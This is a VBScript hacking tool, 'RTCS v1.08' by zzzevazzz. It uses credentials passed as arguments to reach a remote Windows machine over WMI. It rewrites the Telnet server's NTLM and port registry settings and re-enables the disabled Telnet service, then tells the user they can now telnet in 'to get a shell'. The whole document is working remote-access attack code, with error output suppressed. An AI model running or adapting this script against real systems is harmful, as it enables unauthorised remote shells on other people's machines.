on error resume next
if (lcase(right(wscript.fullname,11))=”wscript.exe”) then
set objShell=wscript.createObject(“wscript.shell”)
objShell.Run(“cmd.exe /k cscript //nologo “&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
if wscript.arguments.count<5 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
ntlm=wscript.arguments(3)
port=wscript.arguments(4)
if password=chr(34)&chr(34) then password=NULL
if ntlm<0 or ntlm>2 then
usage()
wscript.echo “The value of NTML is wrong.”
wscript.quit
end if
usage()
wscript.echo “Conneting “&ipaddress&”….”
set objlocator=createobject(“wbemscripting.swbemlocator”)
set objswbemservices=objlocator.connectserver(ipaddress,”root/default”,username,password)
showerror(err.number)
wscript.echo “Setting NTLM=”&ntlm&”….”
set objinstance=objswbemservices.get(“stdregprov”)
set objmethod=objinstance.methods_(“SetDWORDvalue”)
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.hdefkey=&h80000002
objinparam.ssubkeyname=”SOFTWAREMicrosoftTelnetServer1.0″
objinparam.svaluename=”NTLM”
objinparam.uvalue=ntlm
set objoutparam=objinstance.execmethod_(“SetDWORDvalue”,objinparam)
showerror(objoutparam.returnvalue)
wscript.echo “Setting port=”&port&”….”
objinparam.svaluename=”TelnetPort”
objinparam.uvalue=port
set objoutparam=objinstance.execmethod_(“SetDWORDvalue”,objinparam)
showerror(objoutparam.returnvalue)
wscript.echo “Querying state of telnet server….”
set objswbemservices=objlocator.connectserver(ipaddress,”rootcimv2″,username,password)
set colinstances=objswbemservices.execquery(“select * from win32_service where name=’tlntsvr'”)
for each objinstance in colinstances
if objinstance.startmode=”Disabled” then
wscript.echo “Telnet server has been disabled. Now changeing start mode to manual….”
set objmethod=objinstance.methods_(“changestartmode”)
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.startmode=”Manual”
set objoutparam=objinstance.execmethod_(“changestartmode”,objinparam)
showerror(objoutparam.returnvalue)
end if
wscript.echo “Changeing state….”
if objinstance.started=true then
intstatus=objinstance.stopservice()
showerror(intstatus)
wscript.echo “Target telnet server has been STOP Successfully.”
else
intstatus=objinstance.startservice()
showerror(intstatus)
wscript.echo “Target telnet server has been START Successfully!”
wscript.echo “Now, you can try: telnet “&ipaddress&” “&port&”, to get a shell.”
end if
next
function showerror(errornumber)
if errornumber<>0 then
wscript.echo “Error!”
wscript.quit
else
wscript.echo “OK!”
end if
end function
function usage()
wscript.echo “************************************************************************”
wscript.echo “RTCS v1.08”
wscript.echo “Remote Telnet Configure Script, by zzzevazzz”
wscript.echo “Welcome to visite [url=http://www.isgrey.com]www.isgrey.com[/url]”
wscript.echo “Usage:”
wscript.echo “cscript “&wscript.scriptfullname&” targetIP username password NTLMAuthor telnetport”
wscript.echo “It will auto change state of target telnet server.”
wscript.echo “************************************************************************”
end function
Chinese 
English